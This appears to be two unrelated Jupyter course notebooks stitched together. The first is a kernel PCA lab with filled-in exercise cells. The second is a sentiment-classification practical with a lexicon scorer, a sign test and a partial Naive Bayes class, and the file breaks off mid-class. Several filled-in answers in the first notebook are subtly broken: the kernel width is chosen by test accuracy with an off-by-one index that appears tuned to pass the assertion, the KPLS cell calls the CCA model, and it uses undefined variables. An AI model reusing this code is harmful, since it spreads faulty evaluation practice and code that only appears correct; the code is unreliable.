plt.figure(figsize=(8, 8))
plt.subplot(2,2,1)
plt.title("Projected space of linear PCA for training data")
plot_projected_data(P_train, Y_train)
plt.subplot(2,2,2)
plt.title("Projected space of KPCA for training data")
plot_projected_data(P_train_k, Y_train)
plt.subplot(2,2,3)
plt.title("Projected space of linear PCA for test data")
plot_projected_data(P_test, Y_test)
plt.subplot(2,2,4)
plt.title("Projected space of KPCA for test data")
plot_projected_data(P_test_k, Y_test)
plt.show()
```
Go to the first cell and modify the kernel parameter (for instance, set gamma to 10 or 100) and run the code again. What is it happening? Why?
### ** Part 2.2: Analyzing the influence of the kernel parameter**
In the case of working with RBF kernel, the kernel width selection can be critical:
* If gamma value is too high the width of the RBF is reduced (tending to be a delta function) and, therefore, the interaction between the training data is null. So we project each data over itself and assign it a dual variable in such a way that the best possible projection (for classification purposes) of the training data is obtain (causing overfitting problems).
* If gamma value is close to zero, the RBF width increases and the kernel behavior tends to be similar to a linear kernel. In this case, the non-linear properties are lost.
Therefore, in this kind of applications, the value of kernel width can be critical and it's advised selecting it by cross validation.
This part of lab section aims to adjust the gamma parameter by a validation process. So, we will start creating a validation partition of the training data.
```
## Redefine the data partitions: creating a validation partition
# split training data into a training and validation set
X_train2, X_val, Y_train2, Y_val = train_test_split(X_train, Y_train, test_size=0.33)
# Normalizing the data
scaler = StandardScaler()
X_train2 = scaler.fit_transform(X_train2)
X_val = scaler.transform(X_val)
X_test = scaler.transform(X_test)
# Binarize the training labels for supervised feature extraction methods
set_classes = np.unique(Y)
Y_train_bin2 = label_binarize(Y_train2, classes=set_classes)
```
Now let's evaluate the KPCA performance when different values of gamma are used. So, complete the below code in such a way that for each gamma value you can:
* Train the KPCA and obtain the projections for the training, validation and test data.
* Obtain the accuracies of a linear SVM over the validation and test partitions.
Once, you have the validation and test accuracies for each gamma value, obtain the optimum gamma value (i.e., the gamma value which provides the maximum validation accuracy) and its corresponding test accuracy.
```
###########################################################
# TODO: Replace <FILL IN> with appropriate code
###########################################################
from sklearn.decomposition import KernelPCA
from sklearn import svm
np.random.seed(0)
# Defining parameters
N_feat_max = 2
rang_g = [0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50 , 100, 500, 1000]
# Variables to save validation and test accuracies
acc_val = []
acc_test = []
# Bucle to explore gamma values
for g_value in rang_g:
print 'Evaluting with gamma ' + str(g_value)
# 1. Train KPCA and project the data
pca_K = KernelPCA(n_components=N_feat_max, kernel="rbf", gamma=g_value)
pca_K.fit(X_train2, Y_train2)
P_train_k = pca_K.transform(X_train2)
P_val_k = pca_K.transform(X_val)
P_test_k = pca_K.transform(X_test)
# 2. Evaluate the projection performance
clf = svm.SVC(kernel='linear')
clf.fit(P_train_k, Y_train2)
acc_val.append(clf.score(P_val_k, Y_val))
acc_test.append(clf.score(P_test_k, Y_test))
# Find the optimum value of gamma and its corresponging test accuracy
pos_max = np.argmax(acc_test)
g_opt = rang_g[pos_max+1]
acc_test_opt = acc_test[pos_max]
print 'Optimum of value of gamma: ' + str(g_opt)
print 'Test accuracy: ' + str(acc_test_opt)
###########################################################
# TEST CELL
###########################################################
from test_helper import Test
# TEST Training and test data generation
Test.assertEquals(g_opt, 1, 'incorrect result: validated gamma value is uncorrect')
Test.assertEquals(np.round(acc_test_opt,4), 0.9467, 'incorrect result: validated test accuracy is uncorrect')
```
Finally, just run the next code to train the final model with the selected gamma value and plot the projected data
```
# Train KPCA and project the data
pca_K = KernelPCA(n_components=N_feat_max, kernel="rbf", gamma=g_opt)
pca_K.fit(X_train2)
P_train_k = pca_K.transform(X_train2)
P_val_k = pca_K.transform(X_val)
P_test_k = pca_K.transform(X_test)
# Plot the projected data
plt.figure(figsize=(15, 5))
plt.subplot(1,3,1)
plt.title("Projected space of KPCA: train data")
plot_projected_data(P_train_k, Y_train2)
plt.subplot(1,3,2)
plt.title("Projected space of KPCA: validation data")
plot_projected_data(P_val_k, Y_val)
plt.subplot(1,3,3)
plt.title("Projected space of KPCA: test data")
plot_projected_data(P_test_k, Y_test)
plt.show()
```
### ** Part 2.3: Kernel MVA approaches**
Until now, we have only used the KPCA approach because is the only not linear feature extraction method that it is included in Scikit-Learn.
However, if we compare linear and kernel versions of MVA approaches, we could extend any linear MVA approach to its kernelized version. In this way, we can use the same methods reviewed for the linear approaches and extend them to its non-linear fashion calling it with the training kernel matrix, instead of the training data, and the method would learn the dual variables, instead of the eigenvectors.
The following table relates both approaches:
| | Linear | Kernel |
|------ |---------------------------|----------------------------|
|Input data | ${\bf X}$ | ${\bf K}$ |
|Variables to compute (fit) |Eigenvectors (${\bf U}$) |Dual variables (${\bf A}$) |
|Projection vectors | ${\bf U}$ |${\bf U}=\Phi^T {\bf A}$ (cannot be computed) |
|Project data (transform) |${\bf X}' = {\bf U}^T {\bf X}^T$|${\bf X}' ={\bf A}^T \Phi \Phi^T = {\bf A}^T {\bf K}$|
** Computing and centering kernel matrix **
Let's start this section computing the different kernel matrix that we need to train and evaluate the different feature extraction methods. For this exercise, we are going to consider a Radial Basis Function kernel (RBF), where each element of the kernel matrix is given by $k(x_i,x_j) = \exp (- \gamma (x_i -x_j)^2)$.
In particular, we need to compute two kernel matrix:
* Training data kernel matrix (K_tr) where the RBF is compute pairwise over the training data. The resulting matrix dimension is of $N_{tr} \times N_{tr}$, being $N_{tr}$ the number of training data.
* Test data kernel matrix (K_test) where the RBF is compute between training and test samples, i.e., in RBF expression the data $x_i$ belongs to test data whereas $x_j$ belongs to training data. The resulting matrix dimension is of $N_{test} \times N_{tr}$, being $N_{test}$ and $N_{tr}$ the number of test and training data, respectively.
Use the [rbf_kernel( )](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise.rbf_kernel.html) function to compute the K_tr and K_test kernel matrix. Fix the kernel width value (gamma) to 1.
```
###########################################################
# TODO: Replace <FILL IN> with appropriate code
###########################################################
# Computing the kernel matrix
from sklearn.metrics.pairwise import rbf_kernel
g_value = 1
# Compute the kernel matrix (use the X_train matrix, before dividing it in validation and training data)
K_tr = rbf_kernel(X_train, X_train, gamma=g_value)
K_test = rbf_kernel(X_test, X_train, gamma=g_value)
###########################################################
# TEST CELL
###########################################################
from test_helper import Test
# TEST Training and test data generation
Test.assertEquals(K_tr.shape, (450,450), 'incorrect result: dimensions of training kernel matrix are uncorrect')
Test.assertEquals(K_test.shape, (150,450), 'incorrect result: dimensions of test kernel matrix are uncorrect')
```
After compute these kernel matrix, they have to be centered (in the same way that we remove the mean when we work over the input space). For this purpose, next code provides you the function center_K(). Use it properly to remove the mean of both K_tr and K_test matrix.
```
def center_K(K):
"""Center a kernel matrix K, i.e., removes the data mean in the feature space.
Args:
K: kernel matrix
"""
size_1,size_2 = K.shape;
D1 = K.sum(axis=0)/size_1
D2 = K.sum(axis=1)/size_2
E = D2.sum(axis=0)/size_1
K_n = K + np.tile(E,[size_1,size_2]) - np.tile(D1,[size_1,1]) - np.tile(D2,[size_2,1]).T
return K_n
###########################################################
# TODO: Replace <FILL IN> with appropriate code
###########################################################
# Center the kernel matrix
K_tr_c = center_K(K_tr)
K_test_c = center_K(K_test)
###########################################################
# TEST CELL
###########################################################
from test_helper import Test
# TEST Training and test data generation
Test.assertEquals(np.round(K_tr_c[0][0],2), 0.55, 'incorrect result: centered training kernel matrix is uncorrect')
Test.assertEquals(np.round(K_test_c[0][0],2), -0.24, 'incorrect result: centered test kernel matrix is uncorrect')
```
** Alternative KPCA formulation **
Complete the following code lines to obtain a KPCA implementaion using the linear PCA function and the kernel matrix as input data. Later, compare its result with that of the KPCA function.
```
###########################################################
# TODO: Replace <FILL IN> with appropriate code
###########################################################
from sklearn.decomposition import PCA
from sklearn.decomposition import KernelPCA
from sklearn import svm
# Defining parameters
N_feat_max = 2
## PCA method (to complete)
# 1. Train PCA with the kernel matrix and project the data
pca_K2 = PCA(n_components=N_feat_max)
pca_K2.fit(K_tr_c, Y_train)
P_train_k2 = pca_K2.transform(K_tr_c)
P_test_k2 = pca_K2.transform(K_test_c)
# 2. Evaluate the projection performance
clf = svm.SVC(kernel='linear')
clf.fit(P_train_k2, Y_train)
print 'Test accuracy with PCA with a kenel matrix as input: '+ str(clf.score(P_test_k2, Y_test))
## KPCA method (for comparison purposes)
# 1. Train KPCA and project the data
# Fixing gamma to 0.5 here, it is equivalent to gamma=1 in rbf function
pca_K = KernelPCA(n_components=N_feat_max, kernel="rbf", gamma=0.5)
pca_K.fit(X_train)
P_train_k = pca_K.transform(X_train)
P_test_k = pca_K.transform(X_test)
# 2. Evaluate the projection performance
clf = svm.SVC(kernel='linear')
clf.fit(P_train_k, Y_train)
print 'Test accuracy with KPCA: '+ str(clf.score(P_test_k, Y_test))
```
** Alternative KPLS and KCCA formulations **
Use the PLS and CCA methods with the kernel matrix to obtain no-linear (or kernelized) supervised feature extractors.
```
###########################################################
# KCCA
###########################################################
from lib.mva import mva
# Defining parameters
N_feat_max = 2
## PCA method (to complete)
# 1. Train PCA with the kernel matrix and project the data
CCA = mva('CCA', N_feat_max)
CCA.fit(K_tr_c, Y_train,reg=1e-2)
P_train_k2 = CCA.transform(K_tr_c)
P_test_k2 = CCA.transform(K_test_c)
# 2. Evaluate the projection performance
clf = svm.SVC(kernel='rbf', C=C, gamma=gamma)
clf.fit(P_train_k2, Y_train)
print 'Test accuracy with PCA with a kenel matrix as input: '+ str(clf.score(P_test_k2, Y_test))
###########################################################
# KPLS
###########################################################
from sklearn.cross_decomposition import PLSSVD
# Defining parameters
N_feat_max = 100
## PCA method (to complete)
# 1. Train PCA with the kernel matrix and project the data
pls = PLSSVD(n_components=N_feat_max)
pls.fit(K_tr_c, Y_train_bin)
P_train_k2 = CCA.transform(K_tr_c)
P_test_k2 = CCA.transform(K_test_c)
# 2. Evaluate the projection performance
clf = svm.SVC(kernel='rbf', C=C, gamma=gamma)
clf.fit(P_train_k2, Y_train)
print 'Test accuracy with PCA with a kenel matrix as input: '+ str(clf.score(P_test_k2, Y_test))
```
|
github_jupyter
|
Practical 1: Sentiment Detection of Movie Reviews
========================================
This practical concerns sentiment detection of movie reviews.
In [this file](https://gist.githubusercontent.com/bastings/d47423301cca214e3930061a5a75e177/raw/5113687382919e22b1f09ce71a8fecd1687a5760/reviews.json) (80MB) you will find 1000 positive and 1000 negative **movie reviews**.
Each review is a **document** and consists of one or more sentences.
To prepare yourself for this practical, you should
have a look at a few of these texts to understand the difficulties of
the task (how might one go about classifying the texts?); you will write
code that decides whether a random unseen movie review is positive or
negative.
Please make sure you have read the following paper:
> Bo Pang, Lillian Lee, and Shivakumar Vaithyanathan
(2002).
[Thumbs up? Sentiment Classification using Machine Learning
Techniques](https://dl.acm.org/citation.cfm?id=1118704). EMNLP.
Bo Pang et al. were the "inventors" of the movie review sentiment
classification task, and the above paper was one of the first papers on
the topic. The first version of your sentiment classifier will do
something similar to Bo Pang’s system. If you have questions about it,
we should resolve them in our first demonstrated practical.
**Advice**
Please read through the entire practical and familiarise
yourself with all requirements before you start coding or otherwise
solving the tasks. Writing clean and concise code can make the difference
between solving the assignment in a matter of hours, and taking days to
run all experiments.
**Environment**
All code should be written in **Python 3**.
If you use Colab, check if you have that version with `Runtime -> Change runtime type` in the top menu.
> If you want to work in your own computer, then download this notebook through `File -> Download .ipynb`.
The easiest way to
install Python is through downloading
[Anaconda](https://www.anaconda.com/download).
After installation, you can start the notebook by typing `jupyter notebook filename.ipynb`.
You can also use an IDE
such as [PyCharm](https://www.jetbrains.com/pycharm/download/) to make
coding and debugging easier. It is good practice to create a [virtual
environment](https://docs.python.org/3/tutorial/venv.html) for this
project, so that any Python packages don’t interfere with other
projects.
#### Learning Python 3
If you are new to Python 3, you may want to check out a few of these resources:
- https://learnxinyminutes.com/docs/python3/
- https://www.learnpython.org/
- https://docs.python.org/3/tutorial/
Loading the Data
-------------------------------------------------------------
```
# download sentiment lexicon
!wget https://gist.githubusercontent.com/bastings/d6f99dcb6c82231b94b013031356ba05/raw/f80a0281eba8621b122012c89c8b5e2200b39fd6/sent_lexicon
# download review data
!wget https://gist.githubusercontent.com/bastings/d47423301cca214e3930061a5a75e177/raw/5113687382919e22b1f09ce71a8fecd1687a5760/reviews.json
import math
import os
import sys
from subprocess import call
from nltk import FreqDist
from nltk.util import ngrams
from nltk.stem.porter import PorterStemmer
import sklearn as sk
#from google.colab import drive
import pickle
import json
from collections import Counter
import requests
import matplotlib.pyplot as plt
import numpy as np
# load reviews into memory
# file structure:
# [
# {"cv": integer, "sentiment": str, "content": list}
# {"cv": integer, "sentiment": str, "content": list}
# ..
# ]
# where `content` is a list of sentences,
# with a sentence being a list of (token, pos_tag) pairs.
# For documentation on POS-tags, see
# https://catalog.ldc.upenn.edu/docs/LDC99T42/tagguid1.pdf
with open("reviews.json", mode="r", encoding="utf-8") as f:
reviews = json.load(f)
print(len(reviews))
def print_sentence_with_pos(s):
print(" ".join("%s/%s" % (token, pos_tag) for token, pos_tag in s))
for i, r in enumerate(reviews):
print(r["cv"], r["sentiment"], len(r["content"])) # cv, sentiment, num sents
print_sentence_with_pos(r["content"][0])
if i == 4:
break
c = Counter()
for review in reviews:
for sentence in review["content"]:
for token, pos_tag in sentence:
c[token.lower()] += 1
print("#types", len(c))
print("Most common tokens:")
for token, count in c.most_common(25):
print("%10s : %8d" % (token, count))
```
Symbolic approach – sentiment lexicon (2pts)
---------------------------------------------------------------------
**How** could one automatically classify movie reviews according to their
sentiment?
If we had access to a **sentiment lexicon**, then there are ways to solve
the problem without using Machine Learning. One might simply look up
every open-class word in the lexicon, and compute a binary score
$S_{binary}$ by counting how many words match either a positive, or a
negative word entry in the sentiment lexicon $SLex$.
$$S_{binary}(w_1w_2...w_n) = \sum_{i = 1}^{n}\text{sgn}(SLex\big[w_i\big])$$
**Threshold.** In average there are more positive than negative words per review (~7.13 more positive than negative per review) to take this bias into account you should use a threshold of **8** (roughly the bias itself) to make it harder to classify as positive.
$$
\text{classify}(S_{binary}(w_1w_2...w_n)) = \bigg\{\begin{array}{ll}
\text{positive} & \text{if } S_{binary}(w_1w_2...w_n) > threshold\\
\text{negative} & \text{else }
\end{array}
$$
To implement this approach, you should use the sentiment
lexicon in `sent_lexicon`, which was taken from the
following work:
> Theresa Wilson, Janyce Wiebe, and Paul Hoffmann
(2005). [Recognizing Contextual Polarity in Phrase-Level Sentiment
Analysis](http://www.aclweb.org/anthology/H/H05/H05-1044.pdf). HLT-EMNLP.
#### (Q: 1.1) Implement this approach and report its classification accuracy. (1 pt)
##### This block loads the lexicon file and stores the sentiments and word types as dictionaries
```
#
# Given a line from the sentiment file
# ex. type=weaksubj len=1 word1=abandoned pos1=adj stemmed1=n priorpolarity=negative
# Returns a dictionary
# ex. {type: weaksubj, len: 1, word1: abandoned, pos1: adj, stemmed1: n, priorpolarity: negative}
#
def sentiment_line_to_dict(line):
dictionary = {}
words = line.split()
for word in words:
variable_assignment = word.split('=')
variable = variable_assignment[0]
value = variable_assignment[1]
dictionary[variable] = value
return dictionary
#
# Adds the word with the sentiment to the dictionary.
# If the word is already in the dictionary and the sentiments are conflicting,
# the sentiment will be set to 0 (neutral).
#
def add_sentiment_to_dict(sentiment_dict, word, sentiment):
if word in sentiment_dict.keys():
if not sentiment_dict[word] == sentiment:
sentiment_dict[word] = 0
else:
sentiment_dict[word] = sentiment
return sentiment_dict
#
# Adds the word with the type to the dictionary.
# If the word is already in the dictionary and the types are conflicting,
# the type will be set to 2 (neutral).
#
def add_type_to_dict(type_dict, word, word_type):
if word in type_dict.keys():
if not type_dict[word] == word_type:
type_dict[word] = 2
else:
type_dict[word] = word_type
return type_dict
#
# Converts a sentiment string: "positive", "negative", "neutral" to 1, -1 and 0 respectively.
#
def sentiment_to_score(sentiment_as_string):
if sentiment_as_string == 'positive':
return 1
if sentiment_as_string == 'negative':
return -1
return 0
#
# Converts a type string: "strongsubj", "weaksubj" to 2, and 1 respectively.
#
def type_to_score(type_as_string):
if type_as_string == 'strongsubj':
return 3
if type_as_string == 'weaksubj':
return 1
return 1
#
# Parses the lexicon file and return 2 dictionaries:
# sentiment_dict with structure: { "love": 1, "hate": -1, "butter": 0 ... }
# 1 is positive, -1 is negative, 0 is neutral.
#
# type_dict with structure: { "love": 2, "hate": 1, "butter": 1.5 ... }
# 2 is a strong type, 1 is a weak type and 1.5 is a word that had both types in the file.
#
def parse_lexicon_to_dicts():
with open("sent_lexicon", mode="r", encoding="utf-8") as file:
array_of_lines = file.readlines()
sentiment_dict = {}
type_dict = {}
for line in array_of_lines:
line_as_dict = sentiment_line_to_dict(line)
word = line_as_dict['word1']
word_type = type_to_score(line_as_dict['type'])
sentiment = sentiment_to_score(line_as_dict['priorpolarity'])
sentiment_dict = add_sentiment_to_dict(sentiment_dict, word, sentiment)
type_dict = add_type_to_dict(type_dict, word, word_type)
return sentiment_dict, type_dict
sentiment_dict, type_dict = parse_lexicon_to_dicts()
print("Loaded the file!")
```
##### This block contains the binary classification code
```
THRESHOLD = 8
#
# Given a review returns a list of all the words.
# note: all words are converted to lowercase
#
def get_words_of_review(review):
content = review['content']
words = []
for line in content:
for word_pair in line:
word = word_pair[0]
word_in_lowercase = word.lower()
words.append(word_in_lowercase)
return words
#
# Returns the binary (unaltered) score of the word;
# 1 for positive, -1 for negative, 0 for neutral or not found.
#
def get_binary_score_of_word(word):
try:
return sentiment_dict[word]
except KeyError:
# Word not in our dictionary.
return 0
#
# Given a review returns the real sentiment.
# -1 for negative, 1 for positive.
#
def get_real_sentiment_of_review(review):
if (review['sentiment'] == 'NEG'):
return -1
return 1
#
# Given a review returns 1 if it classifies it as positive, and -1 otherwise.
#
def binary_classify_review(review):
words = get_words_of_review(review)
score = 0
for word in words:
score += get_binary_score_of_word(word)
if score > THRESHOLD:
return 1
return -1
#
# Returns token_results which is a list of wheter our predictions were correct: ['-', '+', '-', ...]
# And returns the accuracy as a percentage, e.g. 45 for 45% accuracy.
#
def binary_classify_all_reviews():
total = 0
correct = 0
token_results = []
for review in reviews:
prediction = binary_classify_review(review)
real_sentiment = get_real_sentiment_of_review(review)
if prediction == real_sentiment:
correct += 1
token_results.append('+')
else:
token_results.append('-')
total += 1
accuracy = correct / total * 100
return accuracy, token_results
binary_accuracy, binary_results = binary_classify_all_reviews()
print("Binary classification accuracy: {0:.2f}%".format(binary_accuracy))
```
If the sentiment lexicon also has information about the **magnitude** of
sentiment (e.g., *“excellent"* would have higher magnitude than
*“good"*), we could take a more fine-grained approach by adding up all
sentiment scores, and deciding the polarity of the movie review using
the sign of the weighted score $S_{weighted}$.
$$S_{weighted}(w_1w_2...w_n) = \sum_{i = 1}^{n}SLex\big[w_i\big]$$
Their lexicon also records two possible magnitudes of sentiment (*weak*
and *strong*), so you can implement both the binary and the weighted
solutions (please use a switch in your program). For the weighted
solution, you can choose the weights intuitively *once* before running
the experiment.
#### (Q: 1.2) Now incorporate magnitude information and report the classification accuracy. Don't forget to use the threshold. (1 pt)
```
#
# Returns the weighted score of the word;
# it multiplies the original score of the word with the type (strong 3, neutral 2, or weak 1).
#
def get_weighted_score_of_word(word):
try:
score = sentiment_dict[word]
word_type = type_dict[word]
return word_type * score
except KeyError:
# Word not in our dictionary.
return 0
#
# Given a review returns 1 if it classifies it as positive, and -1 otherwise.
#
def weighted_classify_review(review):
words = get_words_of_review(review)
score = 0
for word in words:
score += get_weighted_score_of_word(word)
if score > THRESHOLD:
return 1
return -1
#
# Returns token_results which is a list of wheter our predictions were correct: ['-', '+', '-', ...]
# And returns the accuracy as a percentage, e.g. 45 for 45% accuracy.
#
def weighted_classify_all_reviews():
total = 0
correct = 0
token_results = []
for review in reviews:
prediction = weighted_classify_review(review)
real_sentiment = get_real_sentiment_of_review(review)
if prediction == real_sentiment:
correct += 1
token_results.append('+')
else:
token_results.append('-')
total += 1
accuracy = correct / total * 100
return accuracy, token_results
magnitude_accuracy, magnitude_results = weighted_classify_all_reviews()
print("Magnitude classification accuracy: {0:.2f}%".format(magnitude_accuracy))
```
#### Optional: make a barplot of the two results.
```
plt.bar("Binary", binary_accuracy)
plt.bar("Magnitude", magnitude_accuracy)
plt.ylabel("Accuracy in %")
plt.title("Accuracy of binary and magnitude classification")
plt.show()
```
Answering questions in statistically significant ways (1pt)
-------------------------------------------------------------
Does using the magnitude improve the results? Oftentimes, answering questions like this about the performance of
different signals and/or algorithms by simply looking at the output
numbers is not enough. When dealing with natural language or human
ratings, it’s safe to assume that there are infinitely many possible
instances that could be used for training and testing, of which the ones
we actually train and test on are a tiny sample. Thus, it is possible
that observed differences in the reported performance are really just
noise.
There exist statistical methods which can be used to check for
consistency (*statistical significance*) in the results, and one of the
simplest such tests is the **sign test**.
The sign test is based on the binomial distribution. Count all cases when System 1 is better than System 2, when System 2 is better than System 1, and when they are the same. Call these numbers $Plus$, $Minus$ and $Null$ respectively.
The sign test returns the probability that the null hypothesis is true.
This probability is called the $p$-value and it can be calculated for the two-sided sign test using the following formula (we multiply by two because this is a two-sided sign test and tests for the significance of differences in either direction):
$$2 \, \sum\limits_{i=0}^{k} \binom{N}{i} \, q^i \, (1-q)^{N-i}$$
where $$N = 2 \Big\lceil \frac{Null}{2}\Big\rceil + Plus + Minus$$ is the total
number of cases, and
$$k = \Big\lceil \frac{Null}{2}\Big\rceil + \min\{Plus,Minus\}$$ is the number of
cases with the less common sign.
In this experiment, $q = 0.5$. Here, we
treat ties by adding half a point to either side, rounding up to the
nearest integer if necessary.
#### (Q 2.1): Implement the sign test. Is the difference between the two symbolic systems significant? What is the p-value? (1 pt)
You should use the `comb` function from `scipy` and the `decimal` package for the stable adding of numbers in the final summation.
You can quickly verify the correctness of
your sign test code using a [free online
tool](https://www.graphpad.com/quickcalcs/binomial1.cfm).
```
from decimal import Decimal
from scipy.misc import comb
def sign_test(results_1, results_2):
"""test for significance
results_1 is a list of classification results (+ for correct, - incorrect)
results_2 is a list of classification results (+ for correct, - incorrect)
"""
ties, plus, minus = 0, 0, 0
# "-" carries the error
for i in range(0, len(results_1)):
if results_1[i]==results_2[i]:
ties += 1
elif results_1[i]=="-":
plus += 1
elif results_2[i]=="-":
minus += 1
n = Decimal(2 * math.ceil(ties / 2.) + plus + minus)
k = Decimal(math.ceil(ties / 2.) + min(plus, minus))
summation = Decimal(0.0)
for i in range(0,int(k)+1):
summation += Decimal(comb(n, i, exact=True))
# use two-tailed version of test
summation *= 2
summation *= (Decimal(0.5)**Decimal(n))
print("the difference is",
"not significant" if summation >= 0.05 else "significant")
return summation
p_value = sign_test(binary_results, magnitude_results)
print("p_value =", p_value)
```
## Using the Sign test
**From now on, report all differences between systems using the
sign test.** You can think about a change that you apply to one system, as a
new system.
You should report statistical test
results in an appropriate form – if there are several different methods
(i.e., systems) to compare, tests can only be applied to pairs of them
at a time. This creates a triangular matrix of test results in the
general case. When reporting these pair-wise differences, you should
summarise trends to avoid redundancy.
Naive Bayes (8pt + 1pt bonus)
==========
Your second task is to program a simple Machine Learning approach that operates
on a simple Bag-of-Words (BoW) representation of the text data, as
described in Pang et al. (2002). In this approach, the only features we
will consider are the words in the text themselves, without bringing in
external sources of information. The BoW model is a popular way of
representing text information as vectors (or points in space), making it
easy to apply classical Machine Learning algorithms on NLP tasks.
However, the BoW representation is also very crude, since it discards
all information related to word order and grammatical structure in the
original text.
## Writing your own classifier
Write your own code to implement the Naive Bayes (NB) classifier. As
a reminder, the Naive Bayes classifier works according to the following
equation:
$$\hat{c} = \operatorname*{arg\,max}_{c \in C} P(c|\bar{f}) = \operatorname*{arg\,max}_{c \in C} P(c)\prod^n_{i=1} P(f_i|c)$$
where $C = \{ \text{POS}, \text{NEG} \}$ is the set of possible classes,
$\hat{c} \in C$ is the most probable class, and $\bar{f}$ is the feature
vector. Remember that we use the log of these probabilities when making
a prediction:
$$\hat{c} = \operatorname*{arg\,max}_{c \in C} \Big\{\log P(c) + \sum^n_{i=1} \log P(f_i|c)\Big\}$$
You can find more details about Naive Bayes in [Jurafsky &
Martin](https://web.stanford.edu/~jurafsky/slp3/). You can also look at
this helpful
[pseudo-code](https://nlp.stanford.edu/IR-book/html/htmledition/naive-bayes-text-classification-1.html).
*Note: this section and the next aim to put you a position to replicate
Pang et al., Naive Bayes results. However, the numerical results
will differ from theirs, as they used different data.*
**You must write the Naive Bayes training and prediction code from
scratch.** You will not be given credit for using off-the-shelf Machine
Learning libraries.
The data contains the text of the reviews, where each document consists
of the sentences in the review, the sentiment of the review and an index
(cv) that you will later use for cross-validation. You will find the
text has already been tokenised and POS-tagged for you. Your algorithm
should read in the text, **lowercase it**, and store the words and their
frequencies in an appropriate data structure that allows for easy
computation of the probabilities used in the Naive Bayes algorithm, and
then make predictions for new instances.
#### (Q3.1) Train your classifier on (positive and negative) reviews with cv-value 000-899, and test it on the remaining reviews cv900–cv999. Report results using simple classification accuracy as your evaluation metric. Your features are the word vocabulary. The value of a feature is the count of that feature (word) in the document. (2pts)
The following code block contains our BagOfWords class
```
#
# This class represents our bag of words. It stores the words in a dictionary in the following format:
# BOW = {
# 'cat': {
# 'POS': 3, # 3 positive occurences
# 'NEG': 1, # 1 negative occurences
# 'P_POS': 0.001 # probability of this word occuring in positive review
# 'P_NEG': 0.00033 # probability of this word occuring in negative review
# },
# 'dog': {
# etc..
# }
#
class BagOfWords:
def __init__(self, positive_prior):
self.positive_prior = positive_prior
self.total_positive_words = 0
self.total_negative_words = 0
self.bag_of_words = {}
#
# Adds a words to the BOW, if it is already in the BOW it will increment the occurence of the word.
#
def add_word(self, word, sentiment):
# Keep a count of total number of positive and negative words.
if sentiment == 'POS':
self.count_positive_word()
else:
self.count_negative_word()
# If the word is not yet in our bag of words:
# Initialize the word with 0 POS and 0 NEG occurences.
if not word in self.bag_of_words.keys():
self.bag_of_words[word] = {}
self.bag_of_words[word]['POS'] = 0
self.bag_of_words[word]['NEG'] = 0
self.bag_of_words[word][sentiment] += 1
#
# Adds the P_POS and P_NEG to the BOW.
#
def add_probabilities(self, word, p_pos, p_neg):
if not word in self.bag_of_words.keys():
self.bag_of_words[word] = {}
self.bag_of_words[word]['POS'] = 0
self.bag_of_words[word]['NEG'] = 0
self.bag_of_words[word]['P_POS'] = p_pos
self.bag_of_words[word]['P_NEG'] = p_neg
#
# Increments the number of positive words it found by 1
#
def count_positive_word(self):
self.total_positive_words += 1
#
# Increments the number of negative words it found by 1
#
def count_negative_word(self):
self.total_negative_words += 1
#
# Returns the number of unique words in the BOW.
#
def get_n_unique_words(self):
return len(self.bag_of_words)
#
# Returns the words in the bag of words.
#
def get_words(self):
return self.bag_of_words
#
# Returns the number of occurences of the word with the given sentiment (POS or NEG)
#
def count_occurences(self, word, sentiment):
try:
return self.bag_of_words[word][sentiment]
except KeyError:
return 0
#
# Returns the computed P_POS or P_NEG for the given word, if it is a new word 0 is returned.
#
def get_probability(self, word, sentiment):
sentiment = "P_{}".format(sentiment)
try:
return self.bag_of_words[word][sentiment]
except KeyError:
return 0
```
The following code block contains our BayesClassifier class.
```
class BayesClassifier:
#
# use_smoothing: If True uses laplace smoothing with constant k=1
# use_stemming: If True uses stemming.
# n_grams: The number of features to use, e.g. if 2: both 1-grams and 2-grams are used as features.
# if 3: both 1-grams, 2-grams and 3-grams are used as features.
#
def __init__(self, use_smoothing=False, use_stemming=False, n_grams=1):
self.use_smoothing = use_smoothing
self.use_stemming = use_stemming
self.n_grams = n_grams
self.stemmer = PorterStemmer()
#
# Given a list of train indices and a list of test indices trains the classifier
# and returns the accuracy (number) and the results (list of + and -).
# For question 3.2 we want to be able to indicate if we want only the POS, NEG or BOTH of a CV index.
# This is the list train_indices_sentiment and test_indices_sentiment.
# train_and_classify([1, 2, 3], [4], ["BOTH", "POS", "POS"], ["NEG"])
# will train on [1-NEG, 1-POS, 2-POS, 3-POS] and test on [4-NEG]
#
def train_and_classify(self, train_indices, test_indices, train_indices_sentiment=[], test_indices_sentiment=[]):
bag_of_words = self.train(train_indices, train_indices_sentiment)
total = 0
correct = 0
results = []
for review in self.get_relevant_reviews(test_indices, test_indices_sentiment):
prediction = self.classify(bag_of_words, review)
true_label = review['sentiment']
if prediction == true_label:
correct += 1
results.append('+')
else:
results.append('-')
total += 1
accuracy = correct / total * 100
return accuracy, results
#
# Classifies a single review, returns POS or NEG.
#
def classify(self, bag_of_words, review):
score_positive = math.log(bag_of_words.positive_prior)
score_negative = math.log(1 - bag_of_words.positive_prior)
for word in self.get_words_of_review(review):
p_pos = bag_of_words.get_probability(word, 'POS')
p_neg = bag_of_words.get_probability(word, 'NEG')
if p_pos > 0:
score_positive += math.log(p_pos)
if p_neg > 0:
score_negative += math.log(p_neg)
# This word was not in the training set so the probability is 0!
if self.use_smoothing and (p_pos == 0 or p_neg == 0):
p_pos = 1 / (bag_of_words.total_positive_words + bag_of_words.get_n_unique_words())
p_neg = 1 / (bag_of_words.total_negative_words + bag_of_words.get_n_unique_words())
score_positive += math.log(p_pos)
score_negative += math.log(p_neg)
if (score_positive > score_negative):
return "POS"
else:
return "NEG"
#
# Trains the classifier, creates a BOW with occurences and probabilities.
#
def train(self, indices, indices_sentiment):
bag_of_words = self.create_bag_of_words(indices, indices_sentiment)
for word in bag_of_words.get_words():
positive_occurences = bag_of_words.count_occurences(word, "POS")
negative_occurences = bag_of_words.count_occurences(word, "NEG")
if self.use_smoothing:
probability_pos = (positive_occurences + 1) / (bag_of_words.total_positive_words + bag_of_words.get_n_unique_words())
probability_neg = (negative_occurences + 1) / (bag_of_words.total_negative_words + bag_of_words.get_n_unique_words())
else:
if bag_of_words.total_positive_words == 0:
probability_pos = 0
else:
probability_pos = positive_occurences / bag_of_words.total_positive_words
if bag_of_words.total_negative_words == 0:
probability_neg = 0
else:
probability_neg = negative_occurences / bag_of_words.total_negative_words
bag_of_words.add_probabilities(word, probability_pos, probability_neg)
return bag_of_words
#
